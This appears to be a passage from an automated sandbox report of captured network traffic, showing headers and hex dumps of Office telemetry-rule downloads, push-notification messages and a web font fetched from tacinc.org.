                                                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: b8bZTyt9rk+edAjE.3Context: 712609c5ae747be6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC58INData Raw: 4d 53 2d 43 56 3a 20 59 76 6e 6e 36 76 4c 48 71 45 4b 37 35 48 7a 57 58 61 64 36 4c 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                              Data Ascii: MS-CV: Yvnn6vLHqEK75HzWXad6LA.0Payload parsing failed.


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              48192.168.2.64977813.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                              x-ms-request-id: c04d3aa5-c01e-002b-4b56-236e00000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180406Z-17fbfdc98bbnhb2b0umpa641c800000005z000000000bdsu
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              49192.168.2.64977613.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:05 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                              x-ms-request-id: 58585528-701e-000d-4f7a-236de3000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180405Z-r1755647c66fnxpdavnqahfp1w00000006rg00000000ae8z
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              50192.168.2.64977513.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                              x-ms-request-id: 3cf1b782-701e-0001-32e5-21b110000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180405Z-r1755647c66kmfl29f2su56tc400000009c0000000004gbb
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              51192.168.2.64977413.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:05 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 499
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                              x-ms-request-id: 6ff76e76-001e-002b-21c5-2099f2000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180405Z-r1755647c66z4pt7cv1pnqayy400000008mg000000005dtf
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              52192.168.2.64977713.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:05 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                              x-ms-request-id: 55f0b2c4-501e-008f-5c50-239054000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180405Z-17fbfdc98bb7qlzm4x52d2225c0000000670000000000x0m
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              53192.168.2.649780141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC684OUTGET /wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-700.woff2 HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              Origin: https://www.tacinc.org
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                              Content-Length: 17976
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:28 GMT
                                                                                                                                                                                                                              ETag: "66f56b90-4638"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5c9ad663455-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC943INData Raw: 77 4f 46 32 00 01 00 00 00 00 46 38 00 11 00 00 00 00 c9 d4 00 00 45 d6 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 40 1b ea 66 1c 83 6c 06 60 00 84 2e 08 40 09 82 73 11 10 0a 81 ff 38 81 e4 37 0b 83 70 00 01 36 02 24 03 87 5c 04 20 05 83 22 07 86 35 0c 83 74 1b 3a b9 07 f0 a6 53 d6 72 3b 30 4b f7 dc 6b 8d 0c 04 1b 07 08 cc fb 13 ce 42 ba bd 49 2d 27 fb ff 3f 23 39 19 43 a0 0e 53 ad ac f7 c3 08 2a 85 a2 50 15 42 49 33 aa a1 63 cc 7e 70 85 aa d3 39 d1 4e 0a 62 ba 96 71 f4 fb 18 78 c8 51 ed 88 b4 95 2b d2 d6 65 ca e2 50 0a b3 c4 89 50 0e 8e 5e 96 d6 de 6f dd f2 db e9 e1 6c e8 d2 a7 f2 0e a5 a3 86 e7 75 4d 51 2f 8c 1b 95 c2 10 a5 9f 92 b1 9e 2a 63 51 71 1e 0a 67 0f c3 d4 45 db 18 99 0d 13 97 32 ff f8 d5 f7 a6 77 9f 7f a1 c2 41
                                                                                                                                                                                                                              Data Ascii: wOF2F8E@fl`.@s87p6$\ "5t:Sr;0KkBI-'?#9CS*PBI3c~p9NbqxQ+ePP^oluMQ/*cQqgE2wA
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: c3 6a 01 de b1 5b 80 6f 9c 86 ec f2 2f 08 81 75 06 6a 05 bc e5 36 8d 19 80 78 79 59 73 2d 80 f4 fa 7c 6f 0d 80 fb ce b8 d6 7a 40 16 0e 4c 25 f0 a3 25 ad a4 b0 a7 e1 ed 57 9b eb 01 88 c7 87 21 08 08 4e 02 83 71 cd ca 5d 7b 21 6f 00 82 7b 92 15 4d ac 39 9c bf 97 03 cb 5e 3a ba bc 6f 2d 27 76 f3 72 e2 c0 2e 0f 8e d2 d8 3b 00 1c 05 1d 05 39 80 61 c0 78 20 11 98 05 94 86 b9 4c 40 3b 70 23 b0 14 d8 08 ec 31 bf ed c0 bd c0 71 e0 75 e0 4b 90 39 14 5d b5 9e ea 6a d0 c1 7f 8d 8f 82 2e 83 be 82 13 c0 4c b0 01 dc 0e 5e 0a 1e 07 7f 13 e8 60 43 70 7d b0 3f 78 73 f0 f1 e0 97 10 08 04 0f d1 40 60 a9 0e d0 98 10 0e 47 62 70 04 52 32 99 ce 60 72 b8 bc 94 d4 b4 74 31 09 25 93 7c 66 16 85 8a 95 70 29 57 a9 41 a3 85 96 18 b1 d6 3e e3 0e 39 ec 88 63 8e 9f 38 79 ea f4 d9 73 e7
                                                                                                                                                                                                                              Data Ascii: j[o/uj6xyYs-|oz@L%%W!Nq]{!o{M9^:o-'vr.;9ax L@;p#1quK9]j.L^`Cp}?xs@`GbpR2`rt1%|fp)WA>9c8ys
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 49 0b 56 2b bb 14 99 62 2e 72 89 92 7c af 8b 6a de 13 e1 13 2d dc 0b a9 37 9e 16 14 96 ca 0f 68 71 e1 8a 9c 4e ec 69 15 d3 ab 85 30 65 e7 bf 00 1b 52 43 93 13 d9 14 b6 6b 7c 0c 88 83 24 19 66 62 52 78 83 67 7b 23 19 dd 27 91 84 47 0c 7e 4d 95 20 f7 70 37 53 67 01 03 ad 1e 4a 08 d5 3d 59 96 0d f0 6e 3c 30 a4 25 b6 c0 9d 26 e1 c6 b4 f8 35 35 6d 49 bb 0d 55 a5 ce a9 02 a8 96 8c 6a d8 32 53 54 df c2 07 bf 78 56 85 da ea 5c 52 56 d1 30 b2 77 2a ea d7 8c cb 12 00 62 74 a8 30 ee 85 47 83 1d b1 90 78 64 f8 4e dd e0 da cd 1f 10 39 79 aa 40 d3 c4 73 a7 0d 7c ec da cd a4 67 94 c2 31 6f 69 fb f6 89 44 45 b6 21 5e bb cc 98 fe 1d 8e ab ae a9 01 f0 1e ec c9 28 47 53 14 cb 34 3a c4 ea 60 34 59 b4 80 f3 95 2d 39 a4 bd cd ca e5 ce 3d 55 60 0b b4 d6 10 4b 47 54 3d 14 8c 5c
                                                                                                                                                                                                                              Data Ascii: IV+b.r|j-7hqNi0eRCk|$fbRxg{#'G~M p7SgJ=Yn<0%&55mIUj2STxV\RV0w*bt0GxdN9y@s|g1oiDE!^(GS4:`4Y-9=U`KGT=\
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: f3 f4 15 30 f3 a7 b4 cd 7a 07 fd f2 d0 59 57 44 0c f1 1f ab ed 28 a8 9c 8a 3d bb 19 08 83 66 b4 f3 95 05 5b 5e df 14 7d bb c7 a4 45 35 59 04 49 36 1a 3f d1 93 85 d5 79 30 1b fe 6d c0 eb c2 f1 94 96 3d 4b 08 05 db f4 bf 30 ee 2c 94 6b e5 f2 17 26 4a 69 78 2c a2 f7 72 d7 ef d5 49 2e 64 7e 4e 7e c9 d8 a4 f4 6f 79 e6 22 94 fe 3c d8 95 d3 15 9e 3c d8 76 66 2c 4c eb 72 18 51 39 45 cc a6 bc 54 9b 4c 89 1d 18 c1 04 ac df 5d 5d 07 da e9 b0 07 fa 48 7c d6 6e a6 7c e9 85 b0 62 9c 4a da 8c bd 76 7c f8 9d 29 2b f9 27 5d e3 a4 2f a5 f9 fa 8b a3 14 01 bb 48 b7 c1 62 42 f2 03 6e f6 a1 6d cb 27 ed fe 2e 1b 76 81 ec 6f bd 2a a8 a9 bd 49 7a c9 85 f0 39 28 31 1b 6e 6f f1 b3 8b d5 3e a0 7b 2e e4 4e 17 7e 27 08 a9 60 a2 27 31 bb 13 b9 8a 42 88 7f 4a c3 4c 75 18 4d a6 48 45 e1
                                                                                                                                                                                                                              Data Ascii: 0zYWD(=f[^}E5YI6?y0m=K0,k&Jix,rI.d~N~oy"<<vf,LrQ9ETL]]H|n|bJv|)+']/HbBnm'.vo*Iz9(1no>{.N~'`'1BJLuMHE
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 0a 53 ac b2 c9 7a 1b 6c b4 d9 3a 5b 9c 59 c3 24 9f 95 99 85 0d cc 41 aa 9c 52 a9 36 66 b5 34 32 58 83 d4 7a 79 f8 ac 04 68 cc db 9a 7a 4b 37 f8 32 0f be 33 c1 db fd e0 ed ae e3 ad 80 60 d8 64 e8 7a ea 4b 34 0f 99 94 87 46 47 fb 07 9d 51 d6 ab 88 41 21 40 7e 95 44 63 23 86 14 32 c8 17 11 83 85 50 10 4b 16 03 e5 21 68 a1 bb 1d b4 28 e0 b2 3d 10 4f e6 fa e2 1c 47 3d 2c 01 c2 00 75 3d 8f 1e a8 04 b5 45 f3 df 09 47 c4 4a c4 e0 5d 10 ce 82 8c 3a e1 d6 98 dc f4 41 fc 3f e8 51 85 4d 2a 95 a5 7a aa af 68 ad 34 a9 ad 44 53 08 c8 e9 b7 50 ca 66 bd 02 31 d0 ac 26 52 b7 15 f7 6b 89 5c d0 b4 aa fd 21 a1 ed c0 1c 26 b3 ed b0 1e c3 f4 fa b3 d5 9e a0 b5 69 a3 a9 e3 f8 f3 7d 63 fc f6 76 23 09 b4 6d 3b a3 b3 c1 2c 99 33 ad ed dd 36 d7 c2 32 5f d8 2f 93 16 34 9f 7e 32 62 e8
                                                                                                                                                                                                                              Data Ascii: Szl:[Y$AR6f42XzyhzK723`dzK4FGQA!@~Dc#2PK!h(=OG=,u=EGJ]:A?QM*zh4DSPf1&Rk\!&i}cv#m;,362_/4~2b
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 19 d9 59 7e 36 9e c9 22 db 02 8a 5a ba 77 bd da d8 80 f9 9c 59 0a a4 97 87 39 e6 9e 65 7d 48 f2 c1 ee eb b0 f2 d8 55 54 57 af a6 35 8a 92 69 79 d2 e8 d5 c4 92 ce 26 90 b3 30 ec c6 1f f8 9b a9 4c c1 d0 b6 ac 5b 98 02 c1 a0 d1 4b 31 56 f7 3e 07 49 5e a7 fa 7c 6a 17 94 dd c6 0f 3e 78 63 7b f9 3a f8 c3 f6 59 3d 59 72 2b f7 24 4f 85 b6 9c c9 2b 94 4f b1 51 4a 6d 99 fd 96 aa 83 76 93 27 14 cb 58 4c 6d f9 a9 cb 36 a6 e9 58 8a d4 5d af ff db d0 1d 6f ab cb 73 bb 59 7e 3e 94 d8 d1 98 74 68 31 34 ec b8 40 da 0c a5 f0 8b 65 59 9f 5f 8c fa fd 96 83 bf 9b f7 17 87 da 4d 41 49 e9 77 41 39 81 a6 a1 30 fd 12 72 d0 50 c4 12 b4 b1 ac 50 17 90 38 0e 34 b2 3a e6 45 a3 1d 1f 11 69 cf 21 bb 3b 51 10 94 4e dd 94 79 de 9c 7d f3 e9 49 3e b6 fe 04 1f c7 a3 7c 88 3d ef 68 d4 0e 04
                                                                                                                                                                                                                              Data Ascii: Y~6"ZwY9e}HUTW5iy&0L[K1V>I^|j>xc{:Y=Yr+$O+OQJmv'XLm6X]osY~>th14@eY_MAIwA90rPP84:Ei!;QNy}I>|=h
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 03 57 d7 ca 24 3d 36 90 d9 a7 fe 0a f7 78 07 7b 7a bc 73 3c 3c 5d fa 16 10 cb f7 da e7 aa 69 2b 41 6d f9 af df 54 4c a8 b0 88 94 23 c7 7a b3 b3 30 9e 2c 85 93 24 c8 2d a4 f1 55 08 57 2a dd 08 49 99 22 64 fa fa 55 4e 72 23 43 7d 80 41 e5 40 0e 4e 60 6f ee 2b 5e a2 6e 51 67 69 f4 1a ad ab a5 ca 53 d5 52 35 e2 6b a0 26 51 af e5 d2 6b e3 0d d2 e2 a8 ed 5b 51 74 ce 9d 50 ab 09 0f 8d 58 2f 8a 05 fe 3e d5 f0 0c f5 ae e6 14 55 1c b5 8b 94 5f df 0a be 43 d3 f0 f4 f5 c5 cd bc 91 7a 64 ec 69 bc df 65 d5 0f 14 c2 d2 19 7b 97 f4 85 a1 10 42 a1 10 31 af 89 be 96 10 46 58 4b ff e7 2d 73 40 fa ca c7 06 df 97 09 b2 8c a6 1a 8f ca 27 e2 fd 44 89 49 58 f3 2d d6 ec f3 ce 93 32 fa b0 f1 d8 3e c6 77 3f cc f6 74 5f b8 4f 23 0d f3 c9 e4 32 95 4e d7 a2 53 2d 29 7b 77 59 a5 af 7c
                                                                                                                                                                                                                              Data Ascii: W$=6x{zs<<]i+AmTL#z0,$-UW*I"dUNr#C}A@N`o+^nQgiSR5k&Qk[QtPX/>U_Czdie{B1FXK-s@'DIX-2>w?t_O#2NS-){wY|
